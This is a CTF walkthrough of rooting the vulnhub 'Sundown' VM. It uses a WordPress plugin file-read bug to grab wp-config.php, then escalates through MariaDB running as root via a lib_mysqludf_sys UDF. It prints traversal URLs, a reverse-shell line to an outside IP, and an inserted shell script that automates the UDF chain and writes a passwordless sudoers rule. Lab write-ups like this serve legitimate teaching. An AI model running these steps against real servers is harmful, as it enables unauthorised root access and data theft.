How to hack: Sundown CTF — vulnhub walkthrough

This week I’ll go over the steps to get root access on this VM.

As always we get it from vulnhub: https://www.vulnhub.com/entry/sunset-sundown,530/. This one was created by @whitecr0wz, who is responsible for some very interesting VMs.

First we need to find the machine's address on the network; netdiscover picks it up after a couple of seconds:

netdiscover -i eth0 -r 192.168.0.0/24

192.168.0.155 will be my victim IP

Now that we have the target identified, we’ll proceed to enumerate the services running on it via nmap:

SSH and HTTP open

I don't have any credentials to try against SSH, so I go after HTTP first; the first line of the page source reveals it's WordPress:

The theme is one of WordPress's default themes, which most likely has no exploits, so I limit the scope of WPScan to users and plugins only:

wpscan --url http://192.168.0.155 -e ap,u

This reports that only the "admin" user exists and that one plugin is installed: wp-with-spritz. Searching for it on exploit-db shows one RFI exploit:

https://www.exploit-db.com/exploits/44544

Despite the name, as used here the bug just returns the contents of whatever file we ask for, nothing gets executed. That gives us read-only access to the server's filesystem, so it will mostly be used to search for another entry point.

Following the PoC we go after the /etc/passwd file and find a user “carlos”:

Before moving on, I tried some other useful paths like:
/home/carlos/.ssh/id_rsa
/root/.ssh/id_rsa
etc…

they didn’t work but it was worth a shot.

Since the site is WordPress I'll use the same bug to extract its config (I use Firefox's view-source, in case the output contains HTML that the browser would render or hide):

view-source:http://192.168.0.155/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=../../../wp-config.php

From here we can salvage the MySQL user and password; the rest is boilerplate that won't be much use (the authentication keys and salts could be useful for forging a WordPress admin session).

We know there is a carlos user, so I try SSH with him: the DB password didn't work, but carlos/carlos did!

There’s the first flag

Now that I am in, I run LinEnum (https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh) to find anything that stands out and could be useful.

After a long while of reading through the report I notice that LinEnum lists mysql as a superuser account (UID 0 in /etc/passwd):

That is not OK. I go back to the /etc/passwd output and see that I had missed it the first time:

And since wp-config.php gave us the MySQL root password, we now know our attack vector: a database server that runs as root and that we can log into as its root user!

A quick google for “mysql privilege escalation” lands me on this site:

which describes a similar scenario, getting in via a misconfigured WordPress instance.

The exploit works like this: because MariaDB is running as root, anything the server writes to disk with SELECT ... INTO OUTFILE/DUMPFILE is written with root's permissions, whether text or binary (this also requires secure_file_priv to be empty, otherwise the server will only read and write under that directory). I went back to the file-read URL to check whether /etc/sudoers already existed; it does, and MySQL refuses to overwrite an existing file with INTO OUTFILE/DUMPFILE, so I take the longer route from the recipe: load a UDF plugin that lets us run a command (as root in our case). I download the .so for 64-bit Linux and scp it from my machine to the VM:

scp lib_mysqludf_sys.so carlos@192.168.0.155:/home/carlos/

Now I run the MySQL commands that load the .so into a table and then dump it into the plugin folder. The guide hard-codes a plugin path, but that is for stock MySQL; this box runs the MariaDB fork, so I look up the real path with:

SHOW VARIABLES LIKE '%plugin%';

To find the actual path:

Then I adjust the queries for that path.

The table name (potato) is arbitrary.

When loading the plugin I get an invalid ELF header error, meaning the server cannot load the file it just dumped as a shared object:

Reading a bit more on the exploit, I find that Metasploit already ships a build of the library (https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/mysql), so I use their version instead. Same steps, but I named the .so differently, with a _64 suffix, and since MySQL won't overwrite files I had to use that new filename consistently in every query.

The last step would be to run a reverse shell here:

select sys_exec('bash -i >& /dev/tcp/192.168.1.99/443 0>&1');

but that is too easy, so for a small twist (and to avoid handing my IP to the victim 😮), I write a sudoers file in carlos's home folder that grants carlos sudo permissions:

Then from MySQL I use sys_exec to replace the current sudoers file with my version, and sudo su:
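As an added example (my own script, not the post's commands), here is the whole MariaDB UDF chain above scripted from carlos's shell, with the preflight checks I would want before running it: that secure_file_priv does not restrict file I/O, the real plugin_dir, and that the target filename does not already exist (INTO DUMPFILE never overwrites). Assumed and not from the post: the Metasploit .so is at /home/carlos/lib_mysqludf_sys_64.so, the sudoers fragment at /home/carlos/sudoers, that /etc/sudoers includes /etc/sudoers.d, and the drop-in path /etc/sudoers.d/carlos (the post replaced the existing sudoers file instead). The table name potato is the one the post uses.

```shell
#!/bin/sh
# Added example, not the post's own commands: script the MariaDB UDF privilege
# escalation described above, run from carlos's shell on the VM.
# Assumptions (not from the post): the Metasploit lib_mysqludf_sys_64.so is at
# /home/carlos/lib_mysqludf_sys_64.so, a sudoers fragment is prepared at
# /home/carlos/sudoers, and /etc/sudoers includes /etc/sudoers.d.

# Run one statement as the DB root user. MYSQL_PWD keeps the password out of
# the process list; -N -s strip column headers and formatting so the output
# can be captured into a variable.
mysql_q() {
    MYSQL_PWD="$1" mysql -u root -N -s -e "$2"
}

# Print the SQL that copies the .so into the server's plugin directory and
# registers sys_exec(). The table name "potato" is arbitrary.
# $1 = plugin_dir as reported by @@plugin_dir (trailing slash tolerated)
# $2 = path of the .so on disk (LOAD_FILE runs as the server's user: root here)
build_udf_sql() {
    plugin_dir=${1%/}
    so_src=$2
    so_name=$(basename "$so_src")
    cat <<EOF
USE mysql;
CREATE TABLE IF NOT EXISTS potato (line BLOB);
DELETE FROM potato;
INSERT INTO potato VALUES (LOAD_FILE('$so_src'));
SELECT line FROM potato INTO DUMPFILE '$plugin_dir/$so_name';
CREATE FUNCTION sys_exec RETURNS INTEGER SONAME '$so_name';
EOF
}

# SQL that installs a sudoers fragment as root through sys_exec().
# INTO DUMPFILE would refuse to overwrite /etc/sudoers and creates files with
# permissions sudo rejects, so copy and chmod 440 from a root process instead.
# $1 = fragment source, $2 = destination
build_sudoers_sql() {
    printf "SELECT sys_exec('cp %s %s && chmod 440 %s');\n" "$1" "$2" "$2"
}

# Full chain: preflight checks, load the UDF, drop the sudoers fragment.
# $1 = DB root password (from wp-config.php), $2 = .so path, $3 = sudoers fragment
udf_escalate() {
    pass=$1; so_src=$2; sudoers_src=$3
    dst=/etc/sudoers.d/carlos

    # LOAD_FILE / INTO DUMPFILE are confined to this directory when it is set
    # (and disabled entirely when it is NULL).
    sfp=$(mysql_q "$pass" "SELECT @@secure_file_priv;")
    [ -z "$sfp" ] || { echo "secure_file_priv=$sfp blocks file I/O" >&2; return 1; }

    plugin_dir=$(mysql_q "$pass" "SELECT @@plugin_dir;")
    target="${plugin_dir%/}/$(basename "$so_src")"
    # DUMPFILE never overwrites: pick a new filename if this one already exists.
    [ ! -e "$target" ] || { echo "$target exists; rename the .so" >&2; return 1; }

    build_udf_sql "$plugin_dir" "$so_src" | MYSQL_PWD="$pass" mysql -u root
    mysql_q "$pass" "$(build_sudoers_sql "$sudoers_src" "$dst")"
    sudo -l   # the new rule should be listed; then: sudo su
}

# usage (on the VM, as carlos):
#   printf 'carlos ALL=(ALL) NOPASSWD: ALL\n' > /home/carlos/sudoers
#   udf_escalate '<db root password>' /home/carlos/lib_mysqludf_sys_64.so /home/carlos/sudoers
```

Two design choices worth noting: the fragment goes into /etc/sudoers.d rather than over /etc/sudoers, so a typo in it cannot lock sudo for the whole box, and it is chmod'ed to 440 because sudo refuses world-writable or group-writable sudoers files, which is also why a plain INTO DUMPFILE into /etc/sudoers.d would not have been enough.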

We are now root!

Now we cd to root's home and find our beautiful flag waiting for us!

I have no idea what the ASCII Art is…

Now we know why we shouldn't run MySQL (or any service) as root: every file-write feature of the service becomes a root file write.